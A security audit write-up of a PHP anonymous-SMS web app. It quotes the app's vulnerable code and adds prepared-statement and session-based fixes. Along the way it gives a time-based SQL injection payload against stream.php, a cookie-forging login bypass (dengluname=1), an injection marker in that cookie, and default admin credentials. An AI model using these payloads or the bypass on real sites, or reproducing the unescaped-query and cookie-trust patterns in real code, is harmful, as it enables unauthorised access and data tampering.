Bored, I went looking for source code online to audit. This anonymous-letter app's UI looked clean and tidy, so I figured I'd give auditing it a try.
I really couldn't find any live instances of it online, so I had to set one up myself.
First, import the database.
Then edit \lib\config.php for the database settings.
Configure the Nginx rewrite rules (伪静态):
rewrite ^/stream$ /stream.php;
rewrite ^/status /status.php;
Admin panel: /admin, credentials admin/123456
SMS scheduled-task monitoring URL:
http://<your domain>/other/jk.php
Just add it to the BaoTa (宝塔) panel as a scheduled task that runs every half hour.
It isn't built on an MVC framework, so the PHP files are accessed directly by path.
There are several SQL injections in stream.php:
<?php
header('Content-Type: text/html;charset=utf-8');
header('Access-Control-Allow-Origin:*');
header('Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE');
require('./lib/init.php');
$hfnr  = $_POST['content']; // reply content, taken from the request unchanged
$appid = $_POST['apiid'];   // record id, taken from the request unchanged
// $appid is interpolated straight into the SQL text: injectable
$sql = "select huixin from nmdx_list where suijistr='$appid'";
$hfxinxi = $mysql->getOne($sql);
$sql = "select huixinshijian from nmdx_list where suijistr='$appid'";
$huixinshijianss = $mysql->getOne($sql);
if ($hfxinxi == '') {
    // first reply: both $hfnr and $appid are interpolated unescaped
    $sql = "update nmdx_list set huixin='$hfnr' where suijistr='$appid'";
    $mysql->query($sql);
    $huixinshijian = date("Y-m-d H:i:s");
    $sql = "update nmdx_list set huixinshijian='$huixinshijian' where suijistr='$appid'";
    $mysql->query($sql);
    exit();
}
// later replies are appended with a fixed separator, still unescaped
$hfxinxi = $hfxinxi . '我是分割' . $hfnr;
$sql = "update nmdx_list set huixin='$hfxinxi' where suijistr='$appid'";
$mysql->query($sql);
$huixinshijianss = $huixinshijianss . '我是分割' . date("Y-m-d H:i:s");
$sql = "update nmdx_list set huixinshijian='$huixinshijianss' where suijistr='$appid'";
$mysql->query($sql);
POST /stream.php HTTP/1.1
apiid=1 ' AND (SELECT 6230 FROM (SELECT(SLEEP(5)))rxWg) AND 'fanJ'='fanJ
In status.php:
<?php
header('Content-Type: text/html;charset=utf-8');
header('Access-Control-Allow-Origin:*');
header('Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE');
require('./lib/init.php');
$cwnr  = $_POST['remarks']; // failure reason, taken from the request unchanged
$appid = $_POST['apiid'];   // record id, taken from the request unchanged
// $appid goes into the SQL text unescaped: injectable
$sql = "update nmdx_list set shifoufasong='2' where suijistr='$appid'";
$mysql->query($sql);
if ($cwnr == '黑名单') {
    $cwnr = '匿名短信已经被对方拉入黑名单';
}
// both $cwnr and $appid are interpolated unescaped
$sql = "update nmdx_list set sbyy='$cwnr' where suijistr='$appid'";
$mysql->query($sql);
Obviously $appid is still injectable here.
I won't bother giving a payload.
For example, when you open faxin.php without being logged in, it redirects you to re.php to log in:
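The fix for both stream.php and status.php is the same: stop building SQL text out of request parameters. The following is an added example written for this post, not the project's own code. It assumes a PDO connection to the same nmdx_list table (columns suijistr, huixin, huixinshijian, shifoufasong, sbyy) and uses hypothetical DSN credentials; the project's real settings live in lib/config.php. It also collapses the two separate UPDATEs of stream.php into one transaction, so a reply and its timestamp can no longer get out of step.

```php
<?php
// Added example, not the project's code. Assumes a PDO connection to the
// nmdx_list table that stream.php and status.php write to; DSN and
// credentials below are placeholders (the project keeps its own in lib/config.php).
declare(strict_types=1);

const SEPARATOR = '我是分割'; // the delimiter the original code uses between replies

function connect(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=nmdx;charset=utf8mb4', 'dbuser', 'dbpass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);
}

// Replacement for the body of stream.php: append a reply to the record whose
// suijistr equals $appid. User-controlled values travel only as bound parameters.
function recordReply(PDO $pdo, string $appid, string $content): bool
{
    $now = date('Y-m-d H:i:s');
    $pdo->beginTransaction();
    try {
        $sel = $pdo->prepare(
            'SELECT huixin, huixinshijian FROM nmdx_list WHERE suijistr = :id FOR UPDATE'
        );
        $sel->execute([':id' => $appid]);
        $row = $sel->fetch(PDO::FETCH_ASSOC);
        if ($row === false) {
            $pdo->rollBack();
            return false; // unknown id: the original silently updated zero rows
        }
        // Same concatenation the original performs, done in PHP on fetched values.
        $reply = ($row['huixin'] === null || $row['huixin'] === '')
            ? $content
            : $row['huixin'] . SEPARATOR . $content;
        $times = ($row['huixinshijian'] === null || $row['huixinshijian'] === '')
            ? $now
            : $row['huixinshijian'] . SEPARATOR . $now;

        $upd = $pdo->prepare(
            'UPDATE nmdx_list SET huixin = :reply, huixinshijian = :times WHERE suijistr = :id'
        );
        $upd->execute([':reply' => $reply, ':times' => $times, ':id' => $appid]);
        $pdo->commit();
        return true;
    } catch (Throwable $e) {
        $pdo->rollBack();
        throw $e;
    }
}

// Replacement for the body of status.php: mark the record as failed with a reason.
function markFailed(PDO $pdo, string $appid, string $remarks): int
{
    if ($remarks === '黑名单') {
        $remarks = '匿名短信已经被对方拉入黑名单';
    }
    $stmt = $pdo->prepare(
        "UPDATE nmdx_list SET shifoufasong = '2', sbyy = :reason WHERE suijistr = :id"
    );
    $stmt->execute([':reason' => $remarks, ':id' => $appid]);
    return $stmt->rowCount();
}

// Reject missing, non-string or oversized parameters before touching the database.
function param(string $name, int $maxLen): string
{
    $v = $_POST[$name] ?? '';
    if (!is_string($v) || $v === '' || strlen($v) > $maxLen) {
        http_response_code(400);
        exit('bad request');
    }
    return $v;
}

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/html;charset=utf-8');
    $pdo = connect();
    if (basename($_SERVER['SCRIPT_NAME']) === 'stream.php') {
        recordReply($pdo, param('apiid', 64), param('content', 2000));
    } else {
        markFailed($pdo, param('apiid', 64), param('remarks', 500));
    }
}
```

With emulated prepares disabled, the parameter values never reach the SQL parser as text, so the time-based payload shown above is stored as an ordinary string rather than executed. The length caps are a defensive assumption about what the fields need, not values from the project.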
<?php
$sfyjdl = $_COOKIE['dengluname']; // login state read from a client-controlled cookie
if (empty($sfyjdl)) {
    header("Location: re.php"); // no exit() after the redirect, so the rest of the page still runs
}
Whoever wrote this is brain-dead, deciding login state from a cookie.
Straight cookie bypass:
cookie: dengluname=1;
In user.php:
<?php
$dqyhip = getIp(); // project helper from lib/init.php
$sfyjdl = $_COOKIE['dengluname']; // same cookie-based login check as faxin.php
if (empty($sfyjdl)) {
    header("Location: re.php");
}
$shoujihao = $_COOKIE['dengluname']; // phone number trusted straight from the cookie
// the cookie value is interpolated into the SQL text: injectable
$sql = "select * from nmdx_user where shoujihao='$shoujihao'";
$syxx = $mysql->getRow($sql);
$sydxed = $syxx['sydxedu']; // remaining SMS quota
$yydxed = $syxx['yfdx'];    // SMS already sent
Obviously you combine this with the login bypass above and then do the SQL injection.
GET /user.php HTTP/1.1
cookie: dengluname=1; dengluname=*
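Both faxin.php and user.php have the same root problem: the identity is whatever the client puts in the dengluname cookie. The following is an added example, not the project's code, showing the server-side session approach that replaces that check, applied to user.php. It assumes the nmdx_user table has the shoujihao (phone) column the original reads plus a hypothetical mima_hash column holding password_hash() output, and uses placeholder database credentials.

```php
<?php
// Added example, not the project's code. Replaces the $_COOKIE['dengluname']
// check with a PHP session. Assumes nmdx_user has shoujihao plus a hypothetical
// mima_hash column (password_hash() output); DSN/credentials are placeholders.
declare(strict_types=1);

function startSecureSession(): void
{
    // Session-id cookie: unreadable by JavaScript, not sent cross-site, HTTPS only.
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Strict',
        'secure'   => true,
        'path'     => '/',
    ]);
    session_start();
}

// re.php side: called after the login form is submitted.
function login(PDO $pdo, string $phone, string $password): bool
{
    $stmt = $pdo->prepare('SELECT mima_hash FROM nmdx_user WHERE shoujihao = :phone');
    $stmt->execute([':phone' => $phone]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($password, (string) $hash)) {
        return false;
    }
    session_regenerate_id(true); // new id on privilege change, against fixation
    $_SESSION['phone'] = $phone; // the only identity later pages trust
    return true;
}

// Gate for the top of faxin.php / user.php. The exit matters: the original
// sends the Location header and then keeps executing the rest of the page.
function requireLogin(): string
{
    if (empty($_SESSION['phone'])) {
        header('Location: re.php');
        exit;
    }
    return (string) $_SESSION['phone'];
}

// user.php body: the phone number comes from the session, not from a cookie
// the client can set, and it is bound as a parameter rather than interpolated.
function loadQuota(PDO $pdo, string $phone): ?array
{
    $stmt = $pdo->prepare('SELECT sydxedu, yfdx FROM nmdx_user WHERE shoujihao = :phone');
    $stmt->execute([':phone' => $phone]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (PHP_SAPI !== 'cli') {
    startSecureSession();
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=nmdx;charset=utf8mb4', 'dbuser', 'dbpass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
    $phone  = requireLogin();
    $quota  = loadQuota($pdo, $phone);
    $sydxed = $quota['sydxedu'] ?? 0; // remaining SMS quota, as in the original
    $yydxed = $quota['yfdx'] ?? 0;    // SMS already sent
}
```

The client still holds a cookie, but it is an opaque session id; the phone number it maps to lives only on the server, so the dengluname=1 trick and the injection through the cookie value both stop working at the same point.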
There are more holes, but I couldn't be bothered to dig further: the rest of the backend source is lightly obfuscated and I didn't feel like decoding it. Maybe I'll look again when I have time.